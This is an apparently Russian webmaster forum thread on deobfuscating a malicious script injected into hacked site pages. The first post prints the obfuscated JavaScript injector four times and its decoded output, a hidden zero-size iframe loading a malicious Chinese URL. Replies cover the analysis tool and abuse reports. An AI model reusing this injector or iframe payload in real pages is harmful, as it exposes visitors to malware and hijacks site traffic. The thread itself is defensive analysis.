как понять что делает внедренный на сайт зло-скрипт

[marvinz]

На написание этого поста натолкнула тема

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

но т.к. я не имею достаточного количества постов, то напишу мини-инструкцию как самому разобраться с данными зло-скриптами в этой теме (надеюсь это вам поможет и поднимет общий уровень грамотности

имеем - злой зашифрованный скрипт засунутый вам на страницы.
хотим - понять что он делает (после быстрого вычищения со своих страниц)
что делать -

1) копируем себе в блокнот скрипт
2) понимаем что необходимо выполнить деобфускацию кода
3) качаем специальную программу для исследования вредоносного кода с соусфорджа:

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

4) запихиваем туда скрипт, нажимаем конпку send all scripts to decoder
5) пытаемся декодировать

на примере скрипта из той ветки - декодировать сразу не вышло, ругалось на запрещенные символы, посмотрев код (помогает кнопка Format code) понял что нужно убрать слеши из вызовов функций и закоментил соотв переменные вот так:

function OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01)
 {
   var II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO=I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.length,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O=1024,l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l,IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O,O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0,II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO=0,l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=0,O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O=0,IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI=Array(63,3,50,51,57,55,35,16,27,21,0,0,0,0,0,0,14,44,60,13,22,19,43,37,30,23,59,53,49,31,56,9,29,12,45,18,7,8,42,38,6,34,17,0,0,0,0,52,0,4,39,28,40,41,0,46,48,1,47,2,10,54,5,58,36,25,26,61,15,32,33,24,62,20,11);
   for(IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O=Math.ceil(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO/lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);
   IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O>0;
   IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O--)
   {
  //   O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0=\'\';
     for(l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l=Math.min(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);
     l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l>0;
     l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l--,II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO--)
     {
       O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O|=(IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI[I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.charCodeAt(II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO++)-48])<<l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII;
       if(l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII)
       {
         O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0+=String.fromCharCode(165^O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O&255);
         O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O>>=8;
         l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII-=2
       }
       else
       {
         l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=6
       }
       
     }
     document.write(O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0)
   }
   
 }
 OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111("q2BhIEQ2fIdKI8QWTmc_ZIsblVNKlFB2DjdLzFdKl2B2zrAhQFqhftQL7bc_TDd_QTc_C64v9HwvC1Q3k5c_wHwGTDdKZ3P2f64vi3AK9bQLc042ljQhTgqWl2BhIEQ2fjO")
function OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01)
 {
   var II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO=I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.length,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O=1024,l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l,IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O,O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0,II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO=0,l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=0,O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O=0,IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI=Array(63,3,50,51,57,55,35,16,27,21,0,0,0,0,0,0,14,44,60,13,22,19,43,37,30,23,59,53,49,31,56,9,29,12,45,18,7,8,42,38,6,34,17,0,0,0,0,52,0,4,39,28,40,41,0,46,48,1,47,2,10,54,5,58,36,25,26,61,15,32,33,24,62,20,11);
   for(IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O=Math.ceil(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO/lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);
   IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O>0;
   IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O--)
   {
  //   O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0=\'\';
     for(l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l=Math.min(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);
     l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l>0;
     l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l--,II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO--)
     {
       O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O|=(IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI[I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.charCodeAt(II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO++)-48])<<l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII;
       if(l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII)
       {
         O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0+=String.fromCharCode(165^O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O&255);
         O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O>>=8;
         l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII-=2
       }
       else
       {
         l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=6
       }
       
     }
     document.write(O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0)
   }
   
 }
 OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111("q2BhIEQ2fIdKI8QWTmc_ZIsblVNKlFB2DjdLzFdKl2B2zrAhQFqhftQL7bc_TDd_QTc_C64v9HwvC1Q3k5c_wHwGTDdKZ3P2f64vi3AK9bQLc042ljQhTgqWl2BhIEQ2fjO")
function OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01)
 {
   var II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO=I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.length,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O=1024,l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l,IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O,O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0,II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO=0,l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=0,O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O=0,IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI=Array(63,3,50,51,57,55,35,16,27,21,0,0,0,0,0,0,14,44,60,13,22,19,43,37,30,23,59,53,49,31,56,9,29,12,45,18,7,8,42,38,6,34,17,0,0,0,0,52,0,4,39,28,40,41,0,46,48,1,47,2,10,54,5,58,36,25,26,61,15,32,33,24,62,20,11);
   for(IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O=Math.ceil(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO/lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);
   IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O>0;
   IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O--)
   {
   //  O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0=\'\';
     for(l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l=Math.min(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);
     l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l>0;
     l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l--,II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO--)
     {
       O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O|=(IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI[I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.charCodeAt(II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO++)-48])<<l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII;
       if(l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII)
       {
         O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0+=String.fromCharCode(165^O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O&255);
         O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O>>=8;
         l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII-=2
       }
       else
       {
         l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=6
       }
       
     }
     document.write(O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0)
   }
   
 }
 OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111("q2BhIEQ2fIdKI8QWTmc_ZIsblVNKlFB2DjdLzFdKl2B2zrAhQFqhftQL7bc_TDd_QTc_C64v9HwvC1Q3k5c_wHwGTDdKZ3P2f64vi3AK9bQLc042ljQhTgqWl2BhIEQ2fjO")
function OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111(I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01)
 {
   var II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO=I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.length,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O=1024,l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l,IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O,O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0,II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO=0,l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=0,O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O=0,IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI=Array(63,3,50,51,57,55,35,16,27,21,0,0,0,0,0,0,14,44,60,13,22,19,43,37,30,23,59,53,49,31,56,9,29,12,45,18,7,8,42,38,6,34,17,0,0,0,0,52,0,4,39,28,40,41,0,46,48,1,47,2,10,54,5,58,36,25,26,61,15,32,33,24,62,20,11);
   for(IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O=Math.ceil(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO/lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);
   IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O>0;
   IIIlIIO1I1010OlI10OOIOI0O0lO01l00I0l1l1O--)
   {
//     O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0=\'\';
     for(l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l=Math.min(II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO,lII1O00llO0II1IlO01lO0OO11l0IO0lIIIO0l1O);
     l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l>0;
     l01OOOIOlOllOO1l11III0IO1OlO1IlllIllI10l--,II0OllIIOI1l00101I101001OI0O0I0lO01O0IIO--)
     {
       O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O|=(IIll1OOIOOI0lOI1lIlOIl0ll11lIIlOOlI0I0lI[I001OOOI1100OOI1IlO0llO1ll10O10lOllllI01.charCodeAt(II110l0lO00lOOll0I01111O1O0IIl0ll0IOl1lO++)-48])<<l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII;
       if(l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII)
       {
         O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0+=String.fromCharCode(165^O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O&255);
         O1l1IIl11OIIOI1OlO01lOl0Ill1OI0l0ll1O00O>>=8;
         l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII-=2
       }
       else
       {
         l0lOO0I1IO1O10llI0I0llO1I1IO0O0ll01llOII=6
       }
       
     }
     document.write(O1II0100111O001l0O0O1ll11ll01IlOIl11l0l0)
   }
   
 }
 OIOO10lOl1O1O00lII1IOlOIOO11IlIOllIl1111("q2BhIEQ2fIdKI8QWTmc_ZIsblVNKlFB2DjdLzFdKl2B2zrAhQFqhftQL7bc_TDd_QTc_C64v9HwvC1Q3k5c_wHwGTDdKZ3P2f64vi3AK9bQLc042ljQhTgqWl2BhIEQ2fjO")

и на выходе получил:

undefined<iframe src="http://roons.cn/s/in.cgi?default" width="0" height="0" style="display:none"></iframe>undefined<iframe src="http://roons.cn/s/in.cgi?default" width="0" height="0" style="display:none"></iframe>undefined<iframe src="http://roons.cn/s/in.cgi?default" width="0" height="0" style="display:none"></iframe>undefined<iframe src="http://roons.cn/s/in.cgi?default" width="0" height="0" style="display:none"></iframe>

таким образом мы понимаем что действительно зло скрипт обращается именно к той странице что и была указана многоуважаемым tostrss

Спасибо за внимание!

 

[ask0n]

При запуске малзилла ругается:

Может поэтому декодировать приведенный кусок текста с комментариями отказывается

 

[marvinz]

ask0n, а на какой операционке пробовал? На моем ноутбуке стоит Виста, запустилось без проблем.

погуглил твою длл-ку, попробуй например отсюда скачать:

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

хотя не знаю стоит ли ее качать из неизвестных мест.

 

[ask0n]

я на XP пробовал, сама прога запускается, не смотря на ругательства, а вот с декодом траблы.
Щас попробую на виртуалке с этой библиотекой еще запустить.

 

[Toha20072008]

И что мне это даёт - что даёт понимание того что этот скрипт открывает мне на странице?

 

[marvinz]

Тоша, если тебя взломали и ты знаешь куда идет трафик то ты можешь написать хостеру того человека куда идет трафик (конечно хостер может ничего не придпринимать, но обычно такие письма приносят свой положительный результат), ведь если тот зло-сайт закроют, то не будет смысла снова взламывать тебя, т.к. того сайта уже не будет. (конечно если ты не разберешься как и кто тебя ломает, то восстановление из бекапов станет твоей второй жизнью, а написание абьюз писем разным хостерам любимым занятием)

Желаю успехов с твоим сайтом!

 

[gurban]

уже пару раз меня подобным образом ломали. Есть теория что пароли от фтп крали не прями с компа а где то на маршрутизаторах отлавливали.

Как правило после расшифровки кода я обнаруживал сыылку на вредоносный сайт в Китае.

 

[Onu]

И что мне это даёт - что даёт понимание того что этот скрипт открывает мне на странице?

Это позволяет вредоносному сайту открываться внутри твоего сайта, несколько раз. У него траффик увеличивается, а тебя поисковик банит в это время + пользователь может вирус подцепить с этого сайта.